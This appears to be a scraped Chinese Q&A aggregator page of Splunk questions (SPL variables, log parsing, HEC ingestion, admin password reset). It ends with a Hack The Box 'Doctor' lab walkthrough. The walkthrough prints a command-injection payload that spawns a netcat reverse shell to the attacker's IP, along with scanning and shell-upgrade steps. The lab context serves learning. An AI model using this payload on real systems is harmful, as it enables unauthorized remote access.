splunk

Assign a value to the variable in Splunk and use that value in the search

青春壹個敷衍的年華 提交于 2021-02-19 06:34:10
问题 I have a use-case where I want to set the value to a variable based on the condition and use that variable in the search command. Example:- I want to check the condition if account_no=818 then var1="vpc-06b" else var1="*" I tried ...|eval val1=case(acc_no==818,"vpc-06b",acc_no!=818,"*")|search vpc_id=val1 but I am not getting any event. If I am trying ...|search vpc_id=vpc-06b then, as a result, I am getting the expected output. 回答1: index=... (acc-number=818 AND (vpc_id="vpc-078" OR vpc_id=

Splunk Custom Log format Parsing

若如初见. 提交于 2021-02-11 18:00:22
问题 My splunk log format has key value pairs but one key has caller details which is neither in JSON nor in XML format. It is some internal format for records. JSON logs I can parse with sPath but is there any way so that I can parse custom formats. For example my logs are in following format Key1=value1 | Key2=value2 | key3=({intern_key1=value1; inern_key2=value2; intern_key3=value3}; {intern_key1=value1; inern_key2=value2; intern_key3=value3}; {intern_key1=value1; inern_key2=value2; intern_key3

Query for calculating duration between two different logs in Splunk

≯℡__Kan透↙ 提交于 2021-02-08 08:42:12
问题 As part of my requirements, I have to calculate the duration between two different logs using Splunk query. For example: Log 2: 2020-04-22 13:12 ADD request received ID : 123 Log 1 : 2020-04-22 12:12 REMOVE request received ID : 122 The common String between two logs is " request received ID :" and unique strings between two logs are "ADD", "REMOVE". And the expected output duration is 1 hour. Any help would be appreciated. Thanks 回答1: You can use the transaction command, https://docs.splunk

Query for calculating duration between two different logs in Splunk

佐手、 提交于 2021-02-08 08:40:00
问题 As part of my requirements, I have to calculate the duration between two different logs using Splunk query. For example: Log 2: 2020-04-22 13:12 ADD request received ID : 123 Log 1 : 2020-04-22 12:12 REMOVE request received ID : 122 The common String between two logs is " request received ID :" and unique strings between two logs are "ADD", "REMOVE". And the expected output duration is 1 hour. Any help would be appreciated. Thanks 回答1: You can use the transaction command, https://docs.splunk

How do I send JSON files to Splunk Enterprise from JAVA?

余生长醉 提交于 2021-02-07 10:58:55
问题 I start by saying I'm a beginner. I'm setting up a system where I collect some JSON files, I parse them in JAVA (Spring batch) and the part where I'm stuck is sending these files to the HTTP EVENT COLLECTOR (HEC) in Splunk enterprise. I tried crawling the web for some beginner-friendly guides but I couldn't find anything. I want to send POST to the Splunk enterprise with said files, so I can index them after they've been sent. So far I could only connect to localhost:8089 like this:

How do I send JSON files to Splunk Enterprise from JAVA?

半腔热情 提交于 2021-02-07 10:58:22
问题 I start by saying I'm a beginner. I'm setting up a system where I collect some JSON files, I parse them in JAVA (Spring batch) and the part where I'm stuck is sending these files to the HTTP EVENT COLLECTOR (HEC) in Splunk enterprise. I tried crawling the web for some beginner-friendly guides but I couldn't find anything. I want to send POST to the Splunk enterprise with said files, so I can index them after they've been sent. So far I could only connect to localhost:8089 like this:

1:1 call PHP from Python

半城伤御伤魂 提交于 2021-02-05 11:23:14
问题 We're using Splunk (A tool to analyse machine data like log files) and have an application in PHP. For some data we need to do a call to our application in php (CLI-based). Unfortunately Splunk only supports Python calls. Is there an easy way to 1:1 "forward/call" php with the same arguments and return the output, like a "passthru". I've found only parts of the solution with the socalled subprocess module but my python experience is zero, so can't get it to work. For example, splunk calls:

How can I provide metrics to Splunk via HTTP?

半城伤御伤魂 提交于 2021-01-29 10:30:40
问题 I have been reading through Splunk Enterprise documentation and it appears I can provide metrics in JSON format over HTTP/HTTPS: https://docs.splunk.com/Documentation/Splunk/8.1.1/Metrics/GetMetricsInOther#Get_metrics_in_from_clients_over_HTTP_or_HTTPS However I can't see a reference what exactly this JSON format looks like, beyond one example. I'm also not clear from the docs if Splunk can be configured to poll this endpoint on my process, or if I must push the data to Splunk. 回答1: Splunk's

splunk admin password [closed]

自闭症网瘾萝莉.ら 提交于 2021-01-27 14:58:04
问题 Closed. This question is off-topic. It is not currently accepting answers. Want to improve this question? Update the question so it's on-topic for Stack Overflow. Closed 7 years ago . Improve this question How do I reset splunk admin password? I guess I need access to the file system that Splunk is running on in order to modify the password file. It does not use database so do I need to change a file/ variable? 回答1: If you forgot your admin password you will need access to the file system

HTB Doctor

只愿长相守 提交于 2021-01-24 10:32:11
HTB Doctor(Easy) 地址:https://www.hackthebox.eu/home/machines/profile/278 基本信息 在进行渗透之前需要将HTB与kali进行连接,建立连接之后才可以进行渗透 一、信息收集 靶机地址为10.10.10.209 使用nmap对靶机进行扫描 nmap - sC - sV - sT - O - A 10.10 .10 .209 开放了22,80,8089三个端口 8089对应的服务为splunk 二、访问80端口 需要添加一条hosts命令才可以访问其他内容 三、访问doctors.htb vim hosts 10.10 .10 .209 doctors . htb 进入页面后尝试万能登陆密码,但是失败了 注册用户进行登录看看是否有可利用的信息,发现可能存在xss漏洞,可以构造xss代码反弹shell < img src = http : / / 10.10 .14 .3 / $ ( nc . traditional$ IFS - e$ IFS / bin / bash$ IFS '10.10.14.3' $ IFS '1234' ) > 成功反弹,获取交互式shell python3 - c 'import pty;pty.spawn("/bin/bash")' 进入home目录查看是否有可利用信息
订阅 splunk